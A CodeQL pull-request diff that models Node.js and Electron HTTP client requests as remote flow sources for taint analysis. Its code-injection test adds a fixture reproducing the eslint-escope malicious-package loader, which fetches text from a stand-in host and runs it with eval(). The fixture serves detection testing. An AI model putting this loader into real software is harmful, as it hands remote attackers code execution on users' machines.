### PR TITLE
JavaScript: add support for NodeJS and Electron http client libraries

### DIFF
--- a/change-notes/1.18/analysis-javascript.md
+++ b/change-notes/1.18/analysis-javascript.md
@@ -53,3 +53,4 @@
 * HTTP header names are now always normalized to lower case to reflect the fact that they are case insensitive. In particular, the result of `HeaderDefinition.getAHeaderName`, and the first parameter of `HeaderDefinition.defines`, `ExplicitHeaderDefinition.definesExplicitly` and `RouteHandler.getAResponseHeader` is now always a lower-case string.
 * The class `JsonParseCall` has been deprecated. Use `JsonParserCall` instead.
 * The handling of spread arguments in the data flow library has been changed: `DataFlow::InvokeNode.getArgument(i)` is now only defined when there is no spread argument at or before argument position `i`, and similarly `InvokeNode.getNumArgument` is only defined for invocations without spread arguments.
+* HTTP and HTTPS requests made using the Node.js `http.request` and `https.request` APIs and the Electron `Electron.net.request` and `Electron.ClientRequest` APIs are modeled as `RemoteFlowSources`.

--- a/javascript/ql/src/semmle/javascript/frameworks/Electron.qll
+++ b/javascript/ql/src/semmle/javascript/frameworks/Electron.qll
@@ -33,4 +33,54 @@ module Electron {
       this = DataFlow::moduleMember("electron", "BrowserView").getAnInstantiation()
     }
   }
+  
+  /**
+   * A Node.js-style HTTP or HTTPS request made using an Electron module.
+   */
+  abstract class ClientRequest extends NodeJSLib::ClientRequest {}
+  
+  /**
+   * A Node.js-style HTTP or HTTPS request made using `electron.net`, for example `net.request(url)`.
+   */
+  private class NetRequest extends ClientRequest {
+    NetRequest() {
+      this = DataFlow::moduleMember("electron", "net").getAMemberCall("request")
+    }
+    
+    override DataFlow::Node getOptions() {
+      result = this.(DataFlow::MethodCallNode).getArgument(0)
+    }
+  }
+  
+  
+  /**
+   * A Node.js-style HTTP or HTTPS request made using `electron.client`, for example `new client(url)`.
+   */
+  private class NewClientRequest extends ClientRequest {
+    NewClientRequest() {
+      this = DataFlow::moduleMember("electron", "ClientRequest").getAnInstantiation()
+    }
+    
+    override DataFlow::Node getOptions() {
+      result = this.(DataFlow::NewNode).getArgument(0)
+    }
+  }
+  
+    
+  /**
+   * A data flow node that is the parameter of a redirect callback for an HTTP or HTTPS request made by a Node.js process, for example `res` in `net.request(url).on('redirect', (res) => {})`.
+   */
+  private class ClientRequestRedirectEvent extends RemoteFlowSource {
+    ClientRequestRedirectEvent() {
+      exists(NodeJSLib::ClientRequestHandler handler |
+        this = handler.getParameter(0) and
+        handler.getAHandledEvent() = "redirect" and
+        handler.getClientRequest() instanceof ClientRequest
+      )
+    }
+    
+    override string getSourceType() {
+      result = "Electron ClientRequest redirect event"
+    }
+  }
 }

--- a/javascript/ql/test/library-tests/frameworks/Electron/ClientRequest.expected
+++ b/javascript/ql/test/library-tests/frameworks/Electron/ClientRequest.expected
@@ -1,0 +1,2 @@
+| electron.js:7:5:7:38 | net.req ... e.com') |
+| electron.js:8:16:8:78 | new Cli ... POST'}) |

--- a/javascript/ql/test/library-tests/frameworks/Electron/ClientRequest.ql
+++ b/javascript/ql/test/library-tests/frameworks/Electron/ClientRequest.ql
@@ -1,0 +1,4 @@
+import javascript
+
+from NodeJSLib::ClientRequest cr
+select cr

--- a/javascript/ql/test/library-tests/frameworks/Electron/RemoteFlowSources.expected
+++ b/javascript/ql/test/library-tests/frameworks/Electron/RemoteFlowSources.expected
@@ -1,0 +1,5 @@
+| electron.js:10:26:10:33 | response |
+| electron.js:11:28:11:32 | chunk |
+| electron.js:16:26:16:33 | redirect |
+| electron.js:21:23:21:30 | authInfo |
+| electron.js:26:23:26:27 | error |

--- a/javascript/ql/test/library-tests/frameworks/Electron/RemoteFlowSources.ql
+++ b/javascript/ql/test/library-tests/frameworks/Electron/RemoteFlowSources.ql
@@ -1,0 +1,4 @@
+import javascript
+
+from RemoteFlowSource source
+select source

--- a/javascript/ql/test/library-tests/frameworks/Electron/electron.js
+++ b/javascript/ql/test/library-tests/frameworks/Electron/electron.js
@@ -1,4 +1,33 @@
-const {BrowserView, BrowserWindow} = require('electron')
+const {BrowserView, BrowserWindow, ClientRequest, net} = require('electron')
 
 new BrowserWindow({webPreferences: {}})
 new BrowserView({webPreferences: {}})
+
+function makeClientRequests() {
+    net.request('https://example.com').end();
+    var post = new ClientRequest({url: 'https://example.com', method: 'POST'});
+    
+    post.on('response', (response) => {
+      response.on('data', (chunk) => {
+        chunk[0];
+      });
+    });
+    
+    post.on('redirect', (redirect) => {
+      redirect.statusCode;
+      post.followRedirect();
+    });
+    
+    post.on('login', (authInfo, callback) => {
+      authInfo.host;
+      callback('username', 'password');
+    });
+    
+    post.on('error', (error) => {
+      error.something;
+    });
+    
+    post.setHeader('referer', 'https://example.com');
+    post.write('stuff');
+    post.end('more stuff');
+}

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/ClientRequest.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/ClientRequest.expected
@@ -1,0 +1,4 @@
+| src/http.js:18:1:18:30 | http.re ... uth" }) |
+| src/http.js:21:15:26:6 | http.re ... \\n    }) |
+| src/http.js:27:16:27:73 | http.re ... POST'}) |
+| src/https.js:18:1:18:31 | https.r ... uth" }) |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/ClientRequest.ql
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/ClientRequest.ql
@@ -1,0 +1,4 @@
+import javascript
+
+from NodeJSLib::ClientRequest cr
+select cr

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderDefinition.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderDefinition.expected
@@ -1,5 +1,5 @@
 | src/http.js:7:3:7:42 | res.wri ... rget }) | src/http.js:4:32:10:1 | functio ... .foo;\\n} |
 | src/http.js:13:3:13:44 | res.set ... /html') | src/http.js:12:19:16:1 | functio ... ar");\\n} |
-| src/http.js:29:3:29:40 | res.set ... , "23") | src/http.js:28:19:31:1 | functio ... r2");\\n} |
+| src/http.js:63:3:63:40 | res.set ... , "23") | src/http.js:62:19:65:1 | functio ... r2");\\n} |
 | src/https.js:7:3:7:42 | res.wri ... rget }) | src/https.js:4:33:10:1 | functio ... .foo;\\n} |
 | src/https.js:13:3:13:44 | res.set ... /html') | src/https.js:12:20:16:1 | functio ... ar");\\n} |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderDefinition_getNameExpr.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderDefinition_getNameExpr.expected
@@ -1,5 +1,5 @@
 | src/http.js:7:3:7:42 | res.wri ... rget }) | src/http.js:7:17:7:19 | 302 |
 | src/http.js:13:3:13:44 | res.set ... /html') | src/http.js:13:17:13:30 | 'Content-Type' |
-| src/http.js:29:3:29:40 | res.set ... , "23") | src/http.js:29:17:29:33 | req.query.myParam |
+| src/http.js:63:3:63:40 | res.set ... , "23") | src/http.js:63:17:63:33 | req.query.myParam |
 | src/https.js:7:3:7:42 | res.wri ... rget }) | src/https.js:7:17:7:19 | 302 |
 | src/https.js:13:3:13:44 | res.set ... /html') | src/https.js:13:17:13:30 | 'Content-Type' |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RemoteFlowSources.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RemoteFlowSources.expected
@@ -1,0 +1,12 @@
+| src/http.js:6:26:6:32 | req.url |
+| src/http.js:8:3:8:20 | req.headers.cookie |
+| src/http.js:9:3:9:17 | req.headers.foo |
+| src/http.js:21:33:21:40 | response |
+| src/http.js:23:28:23:32 | chunk |
+| src/http.js:29:26:29:33 | response |
+| src/http.js:30:28:30:32 | chunk |
+| src/http.js:40:23:40:30 | authInfo |
+| src/http.js:45:23:45:27 | error |
+| src/https.js:6:26:6:32 | req.url |
+| src/https.js:8:3:8:20 | req.headers.cookie |
+| src/https.js:9:3:9:17 | req.headers.foo |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RemoteFlowSources.ql
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RemoteFlowSources.ql
@@ -1,0 +1,4 @@
+import javascript
+
+from RemoteFlowSource source
+select source

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RequestExpr.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RequestExpr.expected
@@ -1,7 +1,7 @@
 | src/http.js:6:26:6:28 | req | src/http.js:4:32:10:1 | functio ... .foo;\\n} |
 | src/http.js:8:3:8:5 | req | src/http.js:4:32:10:1 | functio ... .foo;\\n} |
 | src/http.js:9:3:9:5 | req | src/http.js:4:32:10:1 | functio ... .foo;\\n} |
-| src/http.js:29:17:29:19 | req | src/http.js:28:19:31:1 | functio ... r2");\\n} |
+| src/http.js:63:17:63:19 | req | src/http.js:62:19:65:1 | functio ... r2");\\n} |
 | src/https.js:6:26:6:28 | req | src/https.js:4:33:10:1 | functio ... .foo;\\n} |
 | src/https.js:8:3:8:5 | req | src/https.js:4:33:10:1 | functio ... .foo;\\n} |
 | src/https.js:9:3:9:5 | req | src/https.js:4:33:10:1 | functio ... .foo;\\n} |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/ResponseExpr.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/ResponseExpr.expected
@@ -2,8 +2,8 @@
 | src/http.js:13:3:13:5 | res | src/http.js:12:19:16:1 | functio ... ar");\\n} |
 | src/http.js:14:3:14:5 | res | src/http.js:12:19:16:1 | functio ... ar");\\n} |
 | src/http.js:15:3:15:5 | res | src/http.js:12:19:16:1 | functio ... ar");\\n} |
-| src/http.js:29:3:29:5 | res | src/http.js:28:19:31:1 | functio ... r2");\\n} |
-| src/http.js:30:3:30:5 | res | src/http.js:28:19:31:1 | functio ... r2");\\n} |
+| src/http.js:63:3:63:5 | res | src/http.js:62:19:65:1 | functio ... r2");\\n} |
+| src/http.js:64:3:64:5 | res | src/http.js:62:19:65:1 | functio ... r2");\\n} |
 | src/https.js:7:3:7:5 | res | src/https.js:4:33:10:1 | functio ... .foo;\\n} |
 | src/https.js:13:3:13:5 | res | src/https.js:12:20:16:1 | functio ... ar");\\n} |
 | src/https.js:14:3:14:5 | res | src/https.js:12:20:16:1 | functio ... ar");\\n} |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/ResponseSendArgument.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/ResponseSendArgument.expected
@@ -1,5 +1,5 @@
 | src/http.js:14:13:14:17 | "foo" | src/http.js:12:19:16:1 | functio ... ar");\\n} |
 | src/http.js:15:11:15:15 | "bar" | src/http.js:12:19:16:1 | functio ... ar");\\n} |
-| src/http.js:30:11:30:16 | "bar2" | src/http.js:28:19:31:1 | functio ... r2");\\n} |
+| src/http.js:64:11:64:16 | "bar2" | src/http.js:62:19:65:1 | functio ... r2");\\n} |
 | src/https.js:14:13:14:17 | "foo" | src/https.js:12:20:16:1 | functio ... ar");\\n} |
 | src/https.js:15:11:15:15 | "bar" | src/https.js:12:20:16:1 | functio ... ar");\\n} |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteHandler.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteHandler.expected
@@ -1,8 +1,8 @@
 | src/http.js:4:32:10:1 | functio ... .foo;\\n} | src/http.js:4:14:10:2 | http.cr ... foo;\\n}) |
 | src/http.js:12:19:16:1 | functio ... ar");\\n} | src/http.js:12:1:16:2 | http.cr ... r");\\n}) |
-| src/http.js:21:12:21:30 | function(req,res){} | src/http.js:23:1:23:31 | http.cr ... dler()) |
-| src/http.js:26:14:26:32 | function(req,res){} | src/http.js:26:1:26:33 | createS ... res){}) |
-| src/http.js:28:19:31:1 | functio ... r2");\\n} | src/http.js:28:1:31:2 | http.cr ... 2");\\n}) |
-| src/http.js:34:12:34:27 | (req,res) => f() | src/http.js:36:1:36:36 | http.cr ... dler()) |
+| src/http.js:55:12:55:30 | function(req,res){} | src/http.js:57:1:57:31 | http.cr ... dler()) |
+| src/http.js:60:14:60:32 | function(req,res){} | src/http.js:60:1:60:33 | createS ... res){}) |
+| src/http.js:62:19:65:1 | functio ... r2");\\n} | src/http.js:62:1:65:2 | http.cr ... 2");\\n}) |
+| src/http.js:68:12:68:27 | (req,res) => f() | src/http.js:70:1:70:36 | http.cr ... dler()) |
 | src/https.js:4:33:10:1 | functio ... .foo;\\n} | src/https.js:4:14:10:2 | https.c ... foo;\\n}) |
 | src/https.js:12:20:16:1 | functio ... ar");\\n} | src/https.js:12:1:16:2 | https.c ... r");\\n}) |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteHandler_getARequestExpr.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteHandler_getARequestExpr.expected
@@ -1,7 +1,7 @@
 | src/http.js:4:32:10:1 | functio ... .foo;\\n} | src/http.js:6:26:6:28 | req |
 | src/http.js:4:32:10:1 | functio ... .foo;\\n} | src/http.js:8:3:8:5 | req |
 | src/http.js:4:32:10:1 | functio ... .foo;\\n} | src/http.js:9:3:9:5 | req |
-| src/http.js:28:19:31:1 | functio ... r2");\\n} | src/http.js:29:17:29:19 | req |
+| src/http.js:62:19:65:1 | functio ... r2");\\n} | src/http.js:63:17:63:19 | req |
 | src/https.js:4:33:10:1 | functio ... .foo;\\n} | src/https.js:6:26:6:28 | req |
 | src/https.js:4:33:10:1 | functio ... .foo;\\n} | src/https.js:8:3:8:5 | req |
 | src/https.js:4:33:10:1 | functio ... .foo;\\n} | src/https.js:9:3:9:5 | req |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteHandler_getAResponseExpr.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteHandler_getAResponseExpr.expected
@@ -2,8 +2,8 @@
 | src/http.js:12:19:16:1 | functio ... ar");\\n} | src/http.js:13:3:13:5 | res |
 | src/http.js:12:19:16:1 | functio ... ar");\\n} | src/http.js:14:3:14:5 | res |
 | src/http.js:12:19:16:1 | functio ... ar");\\n} | src/http.js:15:3:15:5 | res |
-| src/http.js:28:19:31:1 | functio ... r2");\\n} | src/http.js:29:3:29:5 | res |
-| src/http.js:28:19:31:1 | functio ... r2");\\n} | src/http.js:30:3:30:5 | res |
+| src/http.js:62:19:65:1 | functio ... r2");\\n} | src/http.js:63:3:63:5 | res |
+| src/http.js:62:19:65:1 | functio ... r2");\\n} | src/http.js:64:3:64:5 | res |
 | src/https.js:4:33:10:1 | functio ... .foo;\\n} | src/https.js:7:3:7:5 | res |
 | src/https.js:12:20:16:1 | functio ... ar");\\n} | src/https.js:13:3:13:5 | res |
 | src/https.js:12:20:16:1 | functio ... ar");\\n} | src/https.js:14:3:14:5 | res |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteSetup_getARouteHandler.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteSetup_getARouteHandler.expected
@@ -1,10 +1,10 @@
 | src/http.js:4:14:10:2 | http.cr ... foo;\\n}) | src/http.js:4:32:10:1 | functio ... .foo;\\n} |
 | src/http.js:12:1:16:2 | http.cr ... r");\\n}) | src/http.js:12:19:16:1 | functio ... ar");\\n} |
-| src/http.js:23:1:23:31 | http.cr ... dler()) | src/http.js:21:12:21:30 | function(req,res){} |
-| src/http.js:23:1:23:31 | http.cr ... dler()) | src/http.js:23:19:23:30 | getHandler() |
-| src/http.js:26:1:26:33 | createS ... res){}) | src/http.js:26:14:26:32 | function(req,res){} |
-| src/http.js:28:1:31:2 | http.cr ... 2");\\n}) | src/http.js:28:19:31:1 | functio ... r2");\\n} |
-| src/http.js:36:1:36:36 | http.cr ... dler()) | src/http.js:34:12:34:27 | (req,res) => f() |
-| src/http.js:36:1:36:36 | http.cr ... dler()) | src/http.js:36:19:36:35 | getArrowHandler() |
+| src/http.js:57:1:57:31 | http.cr ... dler()) | src/http.js:55:12:55:30 | function(req,res){} |
+| src/http.js:57:1:57:31 | http.cr ... dler()) | src/http.js:57:19:57:30 | getHandler() |
+| src/http.js:60:1:60:33 | createS ... res){}) | src/http.js:60:14:60:32 | function(req,res){} |
+| src/http.js:62:1:65:2 | http.cr ... 2");\\n}) | src/http.js:62:19:65:1 | functio ... r2");\\n} |
+| src/http.js:70:1:70:36 | http.cr ... dler()) | src/http.js:68:12:68:27 | (req,res) => f() |
+| src/http.js:70:1:70:36 | http.cr ... dler()) | src/http.js:70:19:70:35 | getArrowHandler() |
 | src/https.js:4:14:10:2 | https.c ... foo;\\n}) | src/https.js:4:33:10:1 | functio ... .foo;\\n} |
 | src/https.js:12:1:16:2 | https.c ... r");\\n}) | src/https.js:12:20:16:1 | functio ... ar");\\n} |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteSetup_getServer.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/RouteSetup_getServer.expected
@@ -1,8 +1,8 @@
 | src/http.js:4:14:10:2 | http.cr ... foo;\\n}) | src/http.js:4:14:10:2 | http.cr ... foo;\\n}) |
 | src/http.js:12:1:16:2 | http.cr ... r");\\n}) | src/http.js:12:1:16:2 | http.cr ... r");\\n}) |
-| src/http.js:23:1:23:31 | http.cr ... dler()) | src/http.js:23:1:23:31 | http.cr ... dler()) |
-| src/http.js:26:1:26:33 | createS ... res){}) | src/http.js:26:1:26:33 | createS ... res){}) |
-| src/http.js:28:1:31:2 | http.cr ... 2");\\n}) | src/http.js:28:1:31:2 | http.cr ... 2");\\n}) |
-| src/http.js:36:1:36:36 | http.cr ... dler()) | src/http.js:36:1:36:36 | http.cr ... dler()) |
+| src/http.js:57:1:57:31 | http.cr ... dler()) | src/http.js:57:1:57:31 | http.cr ... dler()) |
+| src/http.js:60:1:60:33 | createS ... res){}) | src/http.js:60:1:60:33 | createS ... res){}) |
+| src/http.js:62:1:65:2 | http.cr ... 2");\\n}) | src/http.js:62:1:65:2 | http.cr ... 2");\\n}) |
+| src/http.js:70:1:70:36 | http.cr ... dler()) | src/http.js:70:1:70:36 | http.cr ... dler()) |
 | src/https.js:4:14:10:2 | https.c ... foo;\\n}) | src/https.js:4:14:10:2 | https.c ... foo;\\n}) |
 | src/https.js:12:1:16:2 | https.c ... r");\\n}) | src/https.js:12:1:16:2 | https.c ... r");\\n}) |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/ServerDefinition.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/ServerDefinition.expected
@@ -1,8 +1,8 @@
 | src/http.js:4:14:10:2 | http.cr ... foo;\\n}) |
 | src/http.js:12:1:16:2 | http.cr ... r");\\n}) |
-| src/http.js:23:1:23:31 | http.cr ... dler()) |
-| src/http.js:26:1:26:33 | createS ... res){}) |
-| src/http.js:28:1:31:2 | http.cr ... 2");\\n}) |
-| src/http.js:36:1:36:36 | http.cr ... dler()) |
+| src/http.js:57:1:57:31 | http.cr ... dler()) |
+| src/http.js:60:1:60:33 | createS ... res){}) |
+| src/http.js:62:1:65:2 | http.cr ... 2");\\n}) |
+| src/http.js:70:1:70:36 | http.cr ... dler()) |
 | src/https.js:4:14:10:2 | https.c ... foo;\\n}) |
 | src/https.js:12:1:16:2 | https.c ... r");\\n}) |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/ServerDefinition_getARouteHandler.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/ServerDefinition_getARouteHandler.expected
@@ -1,8 +1,8 @@
 | src/http.js:4:14:10:2 | http.cr ... foo;\\n}) | src/http.js:4:32:10:1 | functio ... .foo;\\n} |
 | src/http.js:12:1:16:2 | http.cr ... r");\\n}) | src/http.js:12:19:16:1 | functio ... ar");\\n} |
-| src/http.js:23:1:23:31 | http.cr ... dler()) | src/http.js:21:12:21:30 | function(req,res){} |
-| src/http.js:26:1:26:33 | createS ... res){}) | src/http.js:26:14:26:32 | function(req,res){} |
-| src/http.js:28:1:31:2 | http.cr ... 2");\\n}) | src/http.js:28:19:31:1 | functio ... r2");\\n} |
-| src/http.js:36:1:36:36 | http.cr ... dler()) | src/http.js:34:12:34:27 | (req,res) => f() |
+| src/http.js:57:1:57:31 | http.cr ... dler()) | src/http.js:55:12:55:30 | function(req,res){} |
+| src/http.js:60:1:60:33 | createS ... res){}) | src/http.js:60:14:60:32 | function(req,res){} |
+| src/http.js:62:1:65:2 | http.cr ... 2");\\n}) | src/http.js:62:19:65:1 | functio ... r2");\\n} |
+| src/http.js:70:1:70:36 | http.cr ... dler()) | src/http.js:68:12:68:27 | (req,res) => f() |
 | src/https.js:4:14:10:2 | https.c ... foo;\\n}) | src/https.js:4:33:10:1 | functio ... .foo;\\n} |
 | src/https.js:12:1:16:2 | https.c ... r");\\n}) | src/https.js:12:20:16:1 | functio ... ar");\\n} |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/isCreateServer.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/isCreateServer.expected
@@ -1,8 +1,8 @@
 | src/http.js:4:14:10:2 | http.cr ... foo;\\n}) |
 | src/http.js:12:1:16:2 | http.cr ... r");\\n}) |
-| src/http.js:23:1:23:31 | http.cr ... dler()) |
-| src/http.js:26:1:26:33 | createS ... res){}) |
-| src/http.js:28:1:31:2 | http.cr ... 2");\\n}) |
-| src/http.js:36:1:36:36 | http.cr ... dler()) |
+| src/http.js:57:1:57:31 | http.cr ... dler()) |
+| src/http.js:60:1:60:33 | createS ... res){}) |
+| src/http.js:62:1:65:2 | http.cr ... 2");\\n}) |
+| src/http.js:70:1:70:36 | http.cr ... dler()) |
 | src/https.js:4:14:10:2 | https.c ... foo;\\n}) |
 | src/https.js:12:1:16:2 | https.c ... r");\\n}) |

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/src/http.js
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/src/http.js
@@ -17,6 +17,40 @@ http.createServer(function(req, res) {
 
 http.request({ auth: "auth" });
 
+function makeClientRequests() {
+    var req = http.request({}, (response) => {
+      response.statusCode;
+      response.on('data', (chunk) => {
+        chunk[0];
+      })
+    })
+    var post = http.request({url: 'https://example.com', method: 'POST'});
+    
+    post.on('response', (response) => {
+      response.on('data', (chunk) => {
+        chunk[0];
+      });
+    });
+    
+    post.on('redirect', (redirect) => { // Electron-specific APIs, not present on Node.js ClientRequests
+      redirect.statusCode;
+      post.followRedirect();
+    });
+    
+    post.on('login', (authInfo, callback) => {
+      authInfo.host;
+      callback('username', 'password');
+    });
+    
+    post.on('error', (error) => {
+      error.something;
+    });
+    
+    post.setHeader('referer', 'https://example.com');
+    post.write('stuff');
+    post.end('more stuff');
+}
+
 function getHandler() {
     return function(req,res){}
 }

--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/src/https.js
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/src/https.js
@@ -16,3 +16,4 @@ https.createServer(function(req, res) {
 })
 
 https.request({ auth: "auth" });
+

--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
@@ -12,6 +12,7 @@
 | angularjs.js:47:16:47:30 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:47:16:47:30 | document.cookie | User-provided value |
 | angularjs.js:50:22:50:36 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:50:22:50:36 | document.cookie | User-provided value |
 | angularjs.js:53:32:53:46 | document.cookie | $@ flows to here and is interpreted as code. | angularjs.js:53:32:53:46 | document.cookie | User-provided value |
+| eslint-escope-build.js:21:16:21:16 | c | $@ flows to here and is interpreted as code. | eslint-escope-build.js:20:22:20:22 | c | User-provided value |
 | express.js:7:24:7:69 | "return ...  + "];" | $@ flows to here and is interpreted as code. | express.js:7:44:7:62 | req.param("wobble") | User-provided value |
 | express.js:9:34:9:79 | "return ...  + "];" | $@ flows to here and is interpreted as code. | express.js:9:54:9:72 | req.param("wobble") | User-provided value |
 | express.js:12:8:12:53 | "return ...  + "];" | $@ flows to here and is interpreted as code. | express.js:12:28:12:46 | req.param("wobble") | User-provided value |

--- a/javascript/ql/test/query-tests/Security/CWE-094/eslint-escope-build.js
+++ b/javascript/ql/test/query-tests/Security/CWE-094/eslint-escope-build.js
@@ -1,0 +1,27 @@
+// the eslint-escope attack, with the URL altered to avoid triggering antivirus software.
+// See https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes
+
+try {
+  var https = require("https");
+  https
+    .get(
+      {
+        hostname: "example.com",
+        path: "modified/to/avoid/antivirus",
+        headers: {
+          "User-Agent":
+            "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
+          Accept:
+            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+        }
+      },
+      r => {
+        r.setEncoding("utf8");
+        r.on("data", c => {
+          eval(c);
+        });
+        r.on("error", () => {});
+      }
+    )
+    .on("error", () => {});
+} catch (e) {}


### PR DESCRIPTION
This PR adds RemoteFlowSources for both the NodeJS http/https client library and the Electron http/https client library and adds CredentialExprs for auth responses. The majority of the work is in NodeJSLib.qll; the Electron QL library simply extends the ClientRequest class from the QL NodeJS library.